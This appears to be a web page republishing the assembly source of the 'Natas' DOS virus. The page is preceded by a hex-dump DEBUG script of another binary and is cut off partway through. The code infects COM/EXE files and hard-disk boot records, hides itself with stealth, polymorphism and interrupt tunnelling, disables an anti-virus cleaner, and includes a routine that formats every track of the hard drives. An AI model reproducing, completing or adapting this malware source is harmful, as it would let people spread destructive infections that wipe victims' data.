CB 00 E8 CF 00 26 8B 45 0D 26 e 02F0 8B 4D 0F 25 1F 00 83 E1 1F 49 33 C1 74 32 B4 3F e 0300 B9 18 00 BA FB 03 CD 21 B8 4D 5A BE 13 04 8B 16 e 0310 FB 03 3B C2 74 1D 86 E0 2B C2 74 17 E8 C5 00 A3 e 0320 01 01 B9 03 00 2B C1 C6 04 E9 89 44 01 51 EB 57 e 0330 E9 80 00 26 8B 45 20 3D 54 42 74 F4 3D 46 2D 74 e 0340 EF 3D 53 43 74 EA 2D 43 4C 74 E5 E8 8D 00 B4 3F e 0350 51 8B D6 CD 21 E8 8C 00 52 50 05 13 03 13 D5 B9 e 0360 00 02 F7 F1 0B D2 74 01 40 89 54 02 89 44 04 58 e 0370 5A B9 10 00 F7 F1 2B 44 08 89 54 14 89 44 16 81 e 0380 EA 00 01 89 16 01 01 B4 40 B9 13 03 BA 00 01 CD e 0390 21 E8 47 00 B4 40 59 8B D6 CD 21 26 8B 4D 0D 26 e 03A0 8B 55 0F 52 83 E1 E0 83 E2 1F 4A 0B CA 5A B8 01 e 03B0 57 CD 21 B4 3E CD 21 E9 FE FD B8 00 3D E8 35 00 e 03C0 93 53 0E 0E 1F 07 B8 20 12 CD 2F B8 16 12 26 8A e 03D0 1D CD 2F 5B 26 C7 45 02 02 00 C3 26 89 6D 15 26 e 03E0 89 6D 17 C3 1E 26 C5 45 11 8C DA 26 89 45 15 26 e 03F0 89 55 17 1F C3 9C 0E E8 C1 FD C3 CD 20 02 00 04 e 0400 00 06 00 08 00 0A 00 0C 00 0E 00 10 00 12 00 14 e 0410 00 16 00 rcx 0313 w q ------------------------------------------------------

Natas Virus

Anonymous March 02, 2011 0

;Natas Virus ;COM/EXE/Boot sector/partition table/full Stealth and polymorphic ;Tunnels ;Does other stuff ;2 files -- v1eng.asm = virus eng.asm = Engine ----------------<>-------------------------------------------------- .model tiny .code file_size equ file_end - v_start sect_size equ (decrypt - v_start + 511) / 512 para_size equ (v_end - v_start + 15) / 16 kilo_size equ (v_end - v_start + 1023) / 1024 find_dos_13 equ tracer_dos_13 - (trace_mode + 1) find_13 equ tracer_13 - (trace_mode + 1) find_15 equ tracer_15 - (trace_mode + 1) find_21 equ tracer_21 - (trace_mode + 1) find_40 equ tracer_40 - (trace_mode + 1) step_21 equ tracer_step_21 - (trace_mode + 1) loader_size equ loader_end - loader no_hook_21 equ new_13_next - (hook_21 + 1) yes_hook_21 equ check_21 - (hook_21 + 1) boot equ 0 file equ 1 years equ 100 shl 1 v_start: jmp decrypt ; push cs ; pop ds ; call copy_ints dw copy_ints - ($ + 2) ; save ints 13 15 21 40 mov ds:hook_21,al ; (0=yes_hook_21) hook 21h mov ds:origin,al ; (0=boot) remeber host mov es,ax ; ES=0 pop di sub di,3 ; address of loader in boot push ax di ; save return address 0:xxxx mov si,offset boot_code call move_boot_code1 ; copy and decode boot code mov al,13h mov dx,offset new_13 call set_int ; hook int 13h call inf_hard ; infect drive C: test byte ptr ds:load_head,dl ; DL=80h drive C:? je boot_retf mov ax,1ffh call random ; time to activate? jne boot_retf jmp kill_disk boot_retf: retf ; return to boot sector ;=====( Copy boot code and (en/de)crypt it )=================================; move_boot_code1:mov ah,ds:[si - 1] ; get key move_boot_code: mov cx,loader_size cld move_boot_loop: lodsb xor al,ah ; code/decode rol ah,1 stosb loop move_boot_loop retn ;=====( Code that was in boot sector before infection )======================; boot_code_key db ? boot_code: db loader_size dup(?) ;=====( Gets inserted into infected Boot sectors/MBRs )======================; loader: call $ + 3 mov di,40h mov ds,di sub word ptr ds:[di-(40h-13h)],kilo_size ; hide memory mov ax,ds:[di-(40h-13h)] mov cl,0ah ror ax,cl ; get TOM address mov es,ax mov ax,200h + sect_size xor bx,bx mov cx,0 load_sect = $ - 2 mov dx,0 load_head = $ - 2 int 13h ; read code into memory jb load_fail push es bx ; address of high code retf load_fail: int 18h loader_end: ;=====( save ints 13h, 15h, 21h & 40h. Assumes ES=CS )=======================; copy_ints: push ds xor ax,ax mov ds,ax ; segment 0 mov si,13h * 4h mov di,offset int_13 push si si movsw movsw ; int 13h to int_13 pop si movsw movsw ; int 13h to dos_13 mov si,15h * 4h movsw movsw ; int 15h to int_15 pop si ; address of int 13h's IVT cmp byte ptr ds:[475h],al ; any hard disks? je copy_int_40 mov si,40h * 4h copy_int_40: movsw movsw ; copy int 13h/40h to int_40 mov si,21h * 4h movsw movsw ; int 21h to int_21 pop ds retn ;=====( get interrupt address )==============================================; get_int: push ax xor ah,ah rol ax,1 rol ax,1 xchg bx,ax xor ax,ax mov es,ax les bx,es:[bx] ; get int address pop ax retn ;=====( Set interrupt address )==============================================; set_int: push ax bx ds xor ah,ah rol ax,1 rol ax,1 xchg ax,bx xor ax,ax push ds mov ds,ax mov ds:[bx],dx pop ds:[bx + 2] pop ds bx ax retn push_all: pop cs:push_pop_ret pushf push ax bx cx dx bp si di ds es mov bp,sp push_pop_jmp: jmp cs:push_pop_ret pop_all: pop cs:push_pop_ret pop es ds di si bp dx cx bx ax popf jmp push_pop_jmp ;=====( Infect Drive C: )====================================================; inf_hard: push cs cs pop es ds mov ax,201h mov bx,offset disk_buff mov cx,1 mov dx,80h call call_13 ; read MBR of drive C: jb cant_inf_hard cmp ds:[bx.pt_start_head],ch ; Jackal? je cant_inf_hard mov cx,ds:[bx.pt_end_sector_track] and cx,0000000000111111b ; get sector count sub cx,sect_size jbe cant_inf_hard cmp cl,1 ; too few sectors? jbe cant_inf_hard call copy_loader ; copy loader into MBR jb cant_inf_hard push bx mov ax,300h + sect_size xor bx,bx call call_13 ; write code to hidden sectors pop bx jb cant_inf_hard mov ax,301h mov cl,1 call call_13 ; write infected MBR cant_inf_hard: retn ;=====( Copy Loader into disk_buff (BX) )====================================; copy_loader: push cx dx cmp word ptr ds:[bx+1feh],0aa55h ; valid boot code? jne copy_load_no mov di,offset boot_code mov ds:[di+load_sect-boot_code],cx ; save track/sector and dl,80h ; Drive C: or A: mov ds:[di+load_head-boot_code],dx ; save head/disk call find_boot ; find code/already infected? je copy_load_no call random_1 ; get random key mov ds:[di - 1],ah ; save key at boot_code_key push si call move_boot_code ; save boot code and encrypt mov si,di ; offset of loader pop di ; boot code pointer mov cx,loader_size rep movsb ; copy loader into boot sect clc mov al,0 org $ - 1 copy_load_no: stc pop dx cx retn ;=====( Find start of boot sector's code )===================================; find_boot: mov si,bx cld lodsb ; get 1st instruction push ax lodsw ; Jump displacement (if jump) xchg cx,ax pop ax cmp al,0ebh ; Short jump? jne find_boot_jump xor ch,ch ; 8bit jump dec si jmp find_boot_add find_boot_jump: cmp al,0e9h ; Near Jump? je find_boot_add find_boot_noadd:xor cx,cx ; No displacement mov si,bx find_boot_add: add si,cx ; si=start of boot code cmp si,offset (disk_buff+200h) - (loader_size + 5) ; jump out of range? jnb find_boot_noadd cmp word ptr ds:[si],00e8h ; CALL -> already infected jne find_boot_ret cmp word ptr ds:[si+2],0bf00h ; 00 MOV DI -> already inf find_boot_ret: retn ;=====( Disable TBCLEAN )====================================================; anti_tbclean: xor ax,ax pushf pop dx and dh,not 1 ; TF off push dx dx popf push ss pop ss pushf ; Not trapped pop dx test dh,1 ; TF set? pop dx je anti_tb_ret push es xor bp,bp mov cx,ss cli mov ss,bp ; segment 0 les di,ss:[bp+1h*4h] ; address of int 1h mov ss,cx sti mov al,0cfh cld stosb ; IRET -> Int 1h pop es push dx popf anti_tb_ret: xchg bp,ax ; save result retn ;=====( Swap jump into DOS' int 13h )========================================; swap_13: call push_all mov si,offset jump_code_13 les di,cs:[si+dos_13-jump_code_13] ; get address in DOS jmp swap_code ;=====( Swap jump into DOS' int 21h )========================================; swap_21: call push_all mov si,offset jump_code_21 les di,cs:[si+int_21-jump_code_21] swap_code: push cs pop ds mov cx,5 cmp ds:origin,ch ; 0 -> Boot origin, no tunnel je swap_end cld swap_loop: lodsb xchg al,es:[di] mov ds:[si-1],al inc di loop swap_loop swap_end: call pop_all retn ;=====( Find original interrupt entry points )===============================; find_ints: call copy_ints ; get interrupt addresses mov ah,52h int 21h mov ax,es:[bx-2] mov ds:dos_seg,ax ; 1st MCB segment mov al,1h call get_int ; get address of int 1h push bx es mov dx,offset tracer call set_int ; hook int 1h pushf pop si mov di,offset trace_mode mov byte ptr ds:[di],find_dos_13 ; find int 13h in DOS ; and BIOS mov ah,1h call si_tf ; set TF call call_13 mov byte ptr ds:[di],find_15 ; find int 15h in BIOS mov ah,0c0h call si_tf ; set TF pushf call ds:int_15 mov byte ptr ds:[di],find_21 ; find int 21h in DOS mov ah,30h call si_tf ; set TF call call_21 mov byte ptr ds:[di],find_40 ; find int 40h in BIOS mov ah,1 call si_tf ; set TF call call_40 and si,not 100h push si popf ; disable Trapping pop ds dx mov al,1 call set_int ; unhook int 1h retn ;=====( Set TF in SI, then set flags to SI )=================================; si_tf: or si,100h push si popf retn ;=====( Tracing/Tunneling )==================================================; tracer: push ds push cs pop ds mov ds:old_di,di mov di,offset old_ax mov ds:[di],ax mov ds:[di+old_bx-old_ax],bx mov ds:[di+old_cx-old_ax],cx mov ds:[di+old_dx-old_ax],dx pop ds:[di-(old_ax-old_ds)] pop bx cx dx ; get IP, CS and Flags mov ax,cs cmp ax,cx ; In our CS? jne $ trace_mode = byte ptr $ - 1 jmp tracer_iret tracer_dos_13: cmp cx,ds:dos_seg ; in DOS code? jnb tracer_cont mov di,offset dos_13 mov ds:trace_mode,find_13 ; find it in BIOS next jmp tracer_save_f tracer_21: cmp cx,1234h ; In DOS code? dos_seg = word ptr $ - 2 jnb tracer_cont mov di,offset int_21 tracer_save: and dh,not 1 ; TF off tracer_save_f: mov ds:[di],bx mov ds:[di + 2],cx ; save address of int jmp tracer_cont tracer_15: mov di,offset int_15 jmp tracer_bios tracer_40: mov di,offset int_40 jmp tracer_bios tracer_13: mov di,offset int_13 tracer_bios: cmp ch,0c8h ; Below BIOS? jb tracer_cont cmp ch,0f4h ; Above BIOS? jb tracer_save jmp tracer_cont tracer_step_21: dec ds:inst_count ; down counter jne tracer_cont push dx mov al,1 lds dx,ds:int_1 ; get int 1h address call set_int call swap_21 ; insert int 21h jump pop dx and dh,not 1h ; TF off tracer_cont: test dh,1 ; TF on? je tracer_iret get_inst: mov ds,cx ; instruction CS xor di,di get_inst1: mov ax,ds:[bx + di] ; get instruction cmp al,0f0h ; LOCK je skip_prefix cmp al,0f2h ; REPNE je skip_prefix cmp al,0f3h ; REPE? je skip_prefix cmp al,9ch ; PUSHF or above? jae emulate_pushf and al,11100111b ; 26,2e,36,3e = 26 cmp al,26h ; Segment Prefix? jne tracer_iret skip_prefix: inc di jmp get_inst1 emulate_pushf: jne emulate_popf and dh,not 1 ; TF off push dx ; fake PUSHF emulate_next: lea bx,ds:[bx + di + 1] ; skip instruction emulate_tf: or dh,1 ; TF on jmp get_inst emulate_popf: cmp al,9dh ; POPF? jne emulate_iret pop dx ; fake POPF jmp emulate_next emulate_iret: cmp al,0cfh ; IRET? jne emulate_int pop bx cx dx ; fake IRET jmp emulate_tf emulate_int: cmp al,0cdh ; Int xx je emulate_int_xx cmp al,0cch ; Int 3? mov ah,3 je emulate_int_x cmp al,0ceh ; Into? mov ah,4 jne tracer_iret test dh,8 ; OF set? je tracer_iret emulate_int_x: dec bx ; [bx+di+2-1] emulate_int_xx: and dh,not 1 ; TF off lea bx,ds:[bx + di + 2] ; get return address push dx cx bx ; fake Int mov al,ah push es call get_int ; get interrupt address mov cx,es pop es jmp emulate_tf tracer_iret: push dx cx bx ; save flags, cs & ip mov ax,0 old_ds = word ptr $ - 2 mov ds,ax mov ax,0 old_ax = word ptr $ - 2 mov bx,0 old_bx = word ptr $ - 2 mov cx,0 old_cx = word ptr $ - 2 mov dx,0 old_dx = word ptr $ - 2 mov di,0 old_di = word ptr $ - 2 iret ;=====( file infections come here after decryption )=========================; file_start: push ds ; save PSP segment call $ + 3 pop si sub si,offset $ - 1 call anti_tbclean ; disable TBCLEAN or bp,bp ; TBCLEAN active? jne go_res mov ah,30h mov bx,-666h int 21h cmp al,3h ; must be DOS 3+ jb jump_host go_res: mov ax,es dec ax mov ds,ax xor di,di or bp,bp ; TBCLEAN here? jne dont_check_mcb cmp byte ptr ds:[di],'Z' ; Last Block? jne jump_host dont_check_mcb: mov ax,para_size sub ds:[di + 3],ax ; from MCB sub ds:[di + 12h],ax ; from PSP mov es,ds:[di + 12h] ; get memory address mov ds,di sub word ptr ds:[413h],kilo_size ; from int 12h mov cx,jump_code_13-v_start cld rep movs byte ptr es:[di],byte ptr cs:[si] mov ax,offset high_code push es ax retf jump_host: push cs pop ds pop es ; PSP segment lea si,ds:[si + header] ; get address of header mov ax,ds:[si] ; get 1st instruction cmp ax,'ZM' ; EXE? je jump_2_exe cmp ax,'MZ' ; EXE? je jump_2_exe mov cx,18h / 2 mov di,100h push es di cld rep movsw ; repair .COM file push es pop ds xchg ax,cx retf jump_2_exe: mov ax,es add ax,10h add ds:[si.eh_cs],ax add ax,ds:[si.eh_ss] ; get SS/CS push es pop ds cli mov ss,ax mov sp,cs:[si.eh_sp] xor ax,ax sti jmp dword ptr cs:[si.eh_ip] high_code: push cs pop ds mov byte ptr ds:[di+origin-jump_code_13],file ; tunnel mov ax,2 call random ; 1 in 3 chance of no stealth ; on special programs mov ds:check_special,al mov ds:hook_21,no_hook_21 ; dont hook int 21h mov al,0eah stosb ; store at jump_code_13 mov ds:[di+4],al mov ax,offset new_13 stosw mov word ptr ds:[di+3],offset new_21 mov ds:[di],cs mov ds:[di+5],cs push di call find_ints ; trace interrupts pop di push cs pop ds mov ax,ds:dos_seg cmp word ptr ds:[di+(dos_13+2)-(jump_code_13+3)],ax ; found DOS' int 13h? ja call_inf_hard cmp word ptr ds:[di+(int_21+2)-(jump_code_13+3)],ax ; found DOS' int 21h? ja call_inf_hard call swap_13 call swap_21 ; insert jumps into DOS call_inf_hard: call inf_hard ; infect drive C: or bp,bp ; ZF -> No TBCLEAN mov si,bp ; SI=0 if goto jump_host jne kill_disk jmp jump_host kill_disk: xor bx,bx mov es,bx ; table to use for format mov dl,80h ; Drive C: kill_next_disk: xor dh,dh ; head 0 kill_next_track:xor cx,cx ; track 0 kill_format: mov ax,501h call call_disk ; format track and cl,11000000b inc ch ; next track low jne kill_format add cl,40h ; next track high jne kill_format xor ah,ah int 13h ; reset disk inc dh ; next head cmp dh,10h jb kill_next_track inc dx ; next drive jmp kill_next_disk ;=====( Interrupt 13h handler )==============================================; new_13: jmp $ hook_21 = byte ptr $ - 1 check_21: call push_all mov al,21h call get_int ; get int 21h address mov ax,es push cs cs pop ds es cmp ax,800h ; too high? ja cant_hook_21 mov di,offset int_21 + 2 std xchg ax,ds:[di] ; swap addresses scasw ; did it change? je cant_hook_21 mov ds:[di],bx mov al,21h mov dx,offset new_21 call set_int ; hook int 21h mov ds:hook_21,no_hook_21 cant_hook_21: call pop_all new_13_next: cmp ah,2h ; Read? jne jump_13 cmp cx,1 ; track 0, sector 1? jne jump_13 or dh,dh ; head 0? je hide_boot jump_13: call call_dos_13 retf 2h hide_boot: call call_dos_13 ; read boot sector call push_all jb hide_boot_err push es cs pop es ds mov cx,100h mov si,bx mov di,offset disk_buff mov bx,di cld rep movsw ; copy boot sector to buffer push cs pop ds call find_boot ; find start/already infected? jne inf_boot mov ax,201h mov cx,ds:[si+load_sect-loader] mov dh,byte ptr ds:[si+(load_head+1)-loader] ; get code location call call_disk ; read virus code jb hide_boot_err mov ax,ds:[0] cmp ds:[bx],ax ; verify infection jne hide_boot_err mov di,ss:[bp.reg_bx] mov es,ss:[bp.reg_es] ; get caller's buffer sub si,bx ; displacement into boot sect. add di,si ; address of loader lea si,ds:[bx+(boot_code-v_start)] ; boot code in virus call move_boot_code1 ; hide infection hide_boot_err: call pop_all retf 2h inf_boot: cmp dl,80h ; hard disk? jnb hide_boot_err mov ax,301h mov cx,1 call call_disk ; Write boot sector to disk ; CY -> Write-Protected jb hide_boot_err mov si,dx ; save drive # mov di,bx mov ax,ds:[di.bs_sectors] ; get number of sectors mov cx,ds:[di.bs_sectors_per_track] sub ds:[di.bs_sectors],cx ; prevent overwriting of code mov ds:hide_count,cx xor dx,dx or ax,ax ; error? je hide_boot_err jcxz hide_boot_err div cx or dx,dx ; even division? jne hide_boot_err mov bx,ds:[di.bs_heads] ; get number of heads or bx,bx je hide_boot_err div bx or dx,dx jne hide_boot_err dec ax mov ch,al ; last track mov cl,1 ; sector 1 dec bx mov dx,si ; drive mov dh,bl ; last head mov bx,di ; offset disk buffer call copy_loader ; Copy loader into Boot sector jb hide_boot_err mov ax,300h + sect_size xor bx,bx call call_disk jb hide_boot_err mov ax,301h mov bx,offset disk_buff mov cx,1 xor dh,dh call call_disk ; write boot sector to disk mov bx,ss:[bp.reg_bx] mov ds,ss:[bp.reg_es] ; get caller's buffer sub ds:[bx.bs_sectors],9ffh ; prevent overwriting of code hide_count = word ptr $ - 2 jmp hide_boot_err ;=====( Interrupt 21h handler )==============================================; new_21: cli mov cs:int_21_ss,ss mov cs:int_21_sp,sp ; save stack pointers push cs pop ss mov sp,offset temp_stack ; allocate stack sti call push_all in al,21h or al,2 ; disable keyboard out 21h,al push cs pop ds mov di,offset new_24 mov word ptr ds:[di-(new_24-handle)],bx ; save handle mov al,24h call get_int ; get address of int 24h mov word ptr ds:[di-(new_24-int_24)],bx mov word ptr ds:[di-(new_24-(int_24+2))],es mov word ptr ds:[di],03b0h ; MOV AL,3 mov byte ptr ds:[di+2],0cfh ; IRET mov dx,di call set_int ; hook int 24h call pop_all call swap_21 ; remove jump from int 21h call push_all cmp ah,30h ; get DOS version? jne is_dir_fcb add bx,666h ; looking for us? jnz is_dir_fcb mov ss:[bp.reg_ax],bx ; set DOS version=0 mov ss:[bp.reg_bx],bx jmp retf_21 is_dir_fcb: cmp ah,11h jb is_dir_asciiz cmp ah,12h ja is_dir_asciiz call call_21 ; do find or al,al ; error? je dir_fcb jmp jump_21 dir_fcb: call save_returns ; save AX call get_psp ; get current PSP mov ax,'HC' scasw ; CHKDSK? jne dir_fcb_ok mov ax,'DK' scasw jne dir_fcb_ok mov ax,'KS' scasw je retf_21 dir_fcb_ok: call get_dta ; get DTA address xor di,di cmp byte ptr ds:[bx],-1 ; extended FCB? jne dir_fcb_next mov di,7h ; fix it up dir_fcb_next: lea si,ds:[bx+di.ds_date+1] ; offset of year -> SI dir_hide: call is_specialfile ; no stealth if helper je retf_21 cmp byte ptr ds:[si],years ; infected? jc retf_21 sub byte ptr ds:[si],years ; restore old date les ax,ds:[bx+di.ds_size] ; get size of file mov cx,es sub ax,file_size ; hide size increase sbb cx,0 jc retf_21 mov word ptr ds:[bx+di.ds_size],ax mov word ptr ds:[bx+di.ds_size+2],cx ; save new size retf_21: call undo_24 ; unhook int 24h call pop_all call swap_21 ; insert jump cli mov ss,cs:int_21_ss mov sp,cs:int_21_sp sti retf 2 is_dir_asciiz: cmp ah,4eh jb is_lseek cmp ah,4fh ja is_lseek call call_21 jnc dir_asciiz go_jump_21: jmp jump_21 dir_asciiz: call save_returns ; save AX and flags call get_dta ; get dta address mov di,-3 lea si,ds:[bx.dta_date+1] ; get year address jmp dir_hide is_lseek: cmp ax,4202h ; Lseek to end? jne is_date call call_21_file jb go_jump_21 call get_dcb ; get DCB address jbe lseek_exit call is_specialfile ; dont hide true size from ; helpers je lseek_exit sub ax,file_size sbb dx,0 ; hide virus at end mov word ptr ds:[di.dcb_pos],ax mov word ptr ds:[di.dcb_pos+2],dx ; set position in DCB lseek_exit: clc call save_returns ; save AX/flags mov ss:[bp.reg_dx],dx jmp retf_21 is_date: cmp ax,5700h ; get date? je get_date cmp ax,5701h ; set date? jne is_read call get_dcb jbe date_err cmp dh,years ; already setting 100 years? jnb date_err add dh,years ; dont erase marker get_date: call is_specialfile ; do not hide date for ; helpers je date_err call call_21_file ; get/set date jnc date_check date_err: jmp jump_21 date_check: cmp dh,years ; infected? jb date_ok sub dh,years date_ok: clc call save_returns ; save ax/flags mov ss:[bp.reg_cx],cx mov ss:[bp.reg_dx],dx ; save time/date jmp retf_21 is_read: cmp ah,3fh ; reading file? je do_read no_read: jmp is_write do_read: call get_dcb ; get DCB address jbe no_read call is_specialfile je no_read les ax,ds:[di.dcb_size] ; get size of file mov bx,es les dx,ds:[di.dcb_pos] ; get current position mov si,es and cs:read_bytes,0 or si,si ; in 1st 64k? jnz read_high cmp dx,18h ; reading header? jnb read_high push cx add cx,dx cmc jnc read_above cmp cx,18h ; read goes above header? read_above: pop cx jb read_below mov cx,18h sub cx,dx read_below: push ax bx ; save size push dx ; position sub dx,18h add ax,dx ; get position in header cmc sbb bx,si xchg word ptr ds:[di.dcb_pos],ax xchg word ptr ds:[di.dcb_pos+2],bx ; lseek to header push ax bx push ds mov ah,3fh mov dx,ss:[bp.reg_dx] mov ds,ss:[bp.reg_ds] call call_21_file ; read file pop ds pop word ptr ds:[di.dcb_pos+2] pop word ptr ds:[di.dcb_pos] pop dx pushf add dx,ax ; adjust position add cs:read_bytes,ax ; remember # of bytes read popf pop bx ax jnc read_high jmp jump_21 read_high: mov word ptr ds:[di.dcb_pos],dx ; update position mov word ptr ds:[di.dcb_pos+2],si mov cx,ss:[bp.reg_cx] ; number of bytes to read sub cx,cs:read_bytes sub ax,file_size sbb bx,0 ; get original size push ax bx sub ax,dx sbb bx,si ; in virus now? pop bx ax jnc read_into xor cx,cx ; read 0 bytes jmp read_fake read_into: add dx,cx adc si,0 ; get position after read cmp bx,si ; read extends into virus? ja read_fake jb read_adjust cmp ax,dx jnb read_fake read_adjust: sub dx,cx ; get position again xchg cx,ax sub cx,dx ; # of bytes to read = Original size - Pos read_fake: mov ah,3fh mov dx,ss:[bp.reg_dx] add dx,cs:read_bytes mov ds,ss:[bp.reg_ds] call call_21_file ; read file jc read_exit add ax,0 read_bytes = word ptr $ - 2 clc read_exit: call save_returns jmp retf_21 is_write: cmp ah,40h ; write? je do_write no_write: jmp is_infect do_write: call get_dcb jbe no_write les ax,ds:[di.dcb_size] ; get file size mov bx,es sub ax,18h sbb bx,0 ; get header position xchg ax,word ptr ds:[di.dcb_pos] xchg bx,word ptr ds:[di.dcb_pos+2] ; lseek to header push ax bx mov ax,2 xchg ax,ds:[di.dcb_mode] ; read/write mode push ax push ds cs pop ds es call read_header ; read 18h bytes pop es:[di.dcb_mode] ; restore access mode jc write_rest_pos mov word ptr es:[di.dcb_pos],ax mov word ptr es:[di.dcb_pos+2],ax ; lseek to start call write_header ; write old header jc write_rest_pos push es pop ds sub word ptr ds:[di.dcb_size],file_size sbb word ptr ds:[di.dcb_size+2],ax ; truncate at virus sub byte ptr ds:[di.dcb_date+1],years ; remove 100 years write_rest_pos: pop word ptr es:[di.dcb_pos+2] pop word ptr es:[di.dcb_pos] jmp jump_21 is_infect: cmp ah,3eh ; Close? je infect_3e cmp ax,4b00h ; Execute? je infect_4b jmp jump_21 infect_4b: mov ax,3d00h ; Open file cmp ax,0 org $ - 2 infect_3e: mov ah,45h ; Duplicate handle call int_2_bios ; lock out protection programs call call_21_file ; get handle mov cs:handle,ax mov ax,4408h cwd jc undo_bios call get_dcb ; get DCB for handle jb cant_infect jne cant_infect ; error/already infected mov bl,00111111b and bl,byte ptr ds:[di.dcb_dev_attr] ; get drive code mov dl,bl ; DX=00** inc bx ; 0=default,1=a,2=b,3=c,etc. call call_21 ; drive removable? mov cx,1h push cs pop es jc test_prot_drive dec ax ; 1=non-removable jz no_protect jmp test_protect test_prot_drive:cmp dl,1 ; A or B? ja no_protect test_protect: mov ax,201h mov bx,offset disk_buff int 13h ; read sector jc cant_infect mov ax,301h int 13h ; write it back jc cant_infect no_protect: inc cx ; CX=2 xchg cx,ds:[di.dcb_mode] ; read/write access mode push cx xor ax,ax xchg ah,ds:[di.dcb_attr] ; attribute=0 test ah,00000100b ; system file? push ax jne cant_system cbw cwd xchg ax,word ptr ds:[di.dcb_pos] xchg dx,word ptr ds:[di.dcb_pos+2] ; lseek to 0 push ax dx mov bp,-'OC' add bp,word ptr ds:[di.dcb_ext] ; BP=0 of CO jnz not_com mov bp,-'MO' add bp,word ptr ds:[di.dcb_ext+1] ; BP=0 if OM not_com: call infect pushf call get_dcb popf jc not_infected add byte ptr ds:[di.dcb_date+1],years ; add 100 years not_infected: or byte ptr ds:[di.dcb_dev_attr+1],40h ; no time/date pop word ptr ds:[di.dcb_pos+2] pop word ptr ds:[di.dcb_pos] cant_system: pop word ptr ds:[di.dcb_attr-1] ; restore attribute pop ds:[di.dcb_mode] ; restore access mode cant_infect: mov ah,3eh call call_21_file ; close file undo_bios: call int_2_bios ; restore interrupts ;=====( Jump on to int 21h )=================================================; jump_21: call undo_24 ; unhook int 24h push cs pop ds mov al,1h mov di,offset int_1 cmp byte ptr ds:[di+origin-int_1],al ; file origin? jne jump_21_1 call get_int ; get int 1h address mov ds:[di],bx mov ds:[di + 2],es mov byte ptr ds:[di+inst_count-int_1],5 mov ds:trace_mode,step_21 mov dx,offset tracer call set_int ; hook int 1h call pop_all push si pushf pop si call si_tf ; set TF pop si go_21: cli mov ss,cs:int_21_ss mov sp,cs:int_21_sp ; restore stack sti go_2_21: jmp cs:int_21 jump_21_1: call pop_all jmp go_21 ;=====( actual infection routine )===========================================; infect: push cs pop ds call read_header ; read first 18h bytes jc inf_bad_file mov si,dx mov di,offset work_header cld rep movsb ; copy header to work_header call get_dcb les ax,ds:[di.dcb_size] ; get file size mov dx,es mov word ptr ds:[di.dcb_pos],ax mov word ptr ds:[di.dcb_pos+2],dx ; lseek to end push cs cs pop es ds mov cx,ds:[si] ; get first 2 bytes cmp cx,'MZ' ; .EXE file? je inf_exe cmp cx,'ZM' ; .EXE file? je inf_exe or dx,bp ; COM file and < 64k? jnz inf_bad_file cmp ax,0-(file_size+100) ja inf_bad_file cmp ax,1000 jb inf_bad_file mov byte ptr ds:[si],0e9h ; build jump inc ah ; Add PSP size (100h) push ax ; save IP for engine add ax,offset decrypt-103h ; get jump disp. (- PSP size) mov ds:[si+1],ax jmp append_vir inf_bad_file: stc retn inf_exe: cmp word ptr ds:[si.eh_max_mem],-1 jne inf_bad_file mov bp,ax mov di,dx ; save size in DI:BP mov cx,200h div cx ; divide into pages or dx,dx ; Any remainder? jz no_round inc ax no_round: sub ax,ds:[si.eh_size] ; size same as header says? jne inf_bad_file sub dx,ds:[si.eh_modulo] jne inf_bad_file mov ax,file_size ; virus size add ax,bp adc dx,di ; + program size div cx ; / 512 or dx,dx ; round up? jz no_round1 inc ax no_round1: mov ds:[si.eh_size],ax mov ds:[si.eh_modulo],dx ; set new size mov bx,0-(file_size+1000) xor cx,cx get_exe_ip: cmp bp,bx ; make sure virus does not ; cross segments jb got_exe_ip sub bp,10h ; down 10h bytes loop get_exe_ip ; up 1 paragraph got_exe_ip: cmp di,0fh ja inf_bad_file xchg cx,ax mov cl,4 ror di,cl ; get segment displacement or ax,ax jz no_para_add sub di,ax ; Add segments from LOOP jnc inf_bad_file no_para_add: sub di,ds:[si.eh_size_header] ; CS-header size in ; paragraphs push bp ; save offset of v_start add bp,decrypt-v_start mov ds:[si.eh_ip],bp ; set IP mov ds:[si.eh_cs],di ; set CS add bp,512 ; 512 bytes of stack mov ds:[si.eh_sp],bp ; set SP mov ds:[si.eh_ss],di ; set SS mov bp,8000h ; Tell engine "Exe file" sar bx,cl ; 0 - ((file_size+1000h)/16) mov ax,ds:[si.eh_min_mem] sub ax,bx ; add file_size+1000h/16 jnb append_vir mov ds:[si.eh_min_mem],ax append_vir: pop ax call engine ; encrypt/write/decrypt push bp popf jc append_vir_err call get_dcb mov word ptr ds:[di.dcb_pos],cx mov word ptr ds:[di.dcb_pos+2],cx ; lseek to start mov ah,40h mov dx,offset work_header push cs pop ds call header_op ; write new header to file append_vir_err: retn ;=====( Get DCB address for file )===========================================; get_dcb: push ax bx mov ax,1220h mov bx,cs:handle ; get file handle int 2fh ; get DCB number address jc get_dcb_fail mov ax,1216h mov bl,es:[di] ; get DCB number cmp bl,-1 ; Handle Openned? cmc je get_dcb_fail int 2fh ; get DCB address jc get_dcb_fail push es pop ds test byte ptr ds:[di.dcb_dev_attr],80h ; device or file? cmc jne get_dcb_fail test byte ptr ds:[di.dcb_date+1],80h ; infected? get_dcb_fail: pop bx ax retn ;=====( Swap original 13h/15h/40h addresses with IVT addresses )=============; int_2_bios: push ax bx dx ds mov al,13h ; int 13h mov di,offset int_13 int_2_bios_lp: push cs pop ds call get_int ; get int address mov dx,es xchg bx,ds:[di] ; swap offsets cld scasw xchg dx,bx xchg bx,ds:[di] ; swap segments scasw mov ds,bx ; DS:DX=new address call set_int ; set int to DS:DX cmp al,15h mov al,15h jnb int_2_bios_40 ; CY AL=13h add di,4 jmp int_2_bios_lp int_2_bios_40: mov al,40h je int_2_bios_lp ; ZR AL=15h else AL=40h, exit pop ds dx bx ax retn ;=====( Read/write header to file )==========================================; read_header: mov ah,3fh cmp ax,0 org $ - 2 write_header: mov ah,40h mov dx,offset header header_op: mov cx,18h call call_21_file ; read/write header jc read_write_err sub ax,cx read_write_err: retn ;=====( Unhook int 24h )=====================================================; undo_24: mov al,24h lds dx,cs:int_24 call set_int ; unhook int 24h in al,21h and al,not 2 ; enable keyboard out 21h,al retn ;=====( Save returns after int 21h call )====================================; save_returns: mov ss:[bp.reg_ax],ax pushf pop ss:[bp.reg_f] retn ;=====( Return ZF set if ARJ, PKZIP, LHA or MODEM )==========================; is_specialfile: push ax cx si di es mov al,0 check_special = byte ptr $ - 1 or al,al ; Check for special? jnz it_is_special call get_psp ; get MCB of current PSP mov ax,es:[di] ; get 1st 2 letters of name cmp ax,'RA' ; ARj? je it_is_special cmp ax,'HL' ; LHa? je it_is_special cmp ax,'KP' ; PKzip? je it_is_special 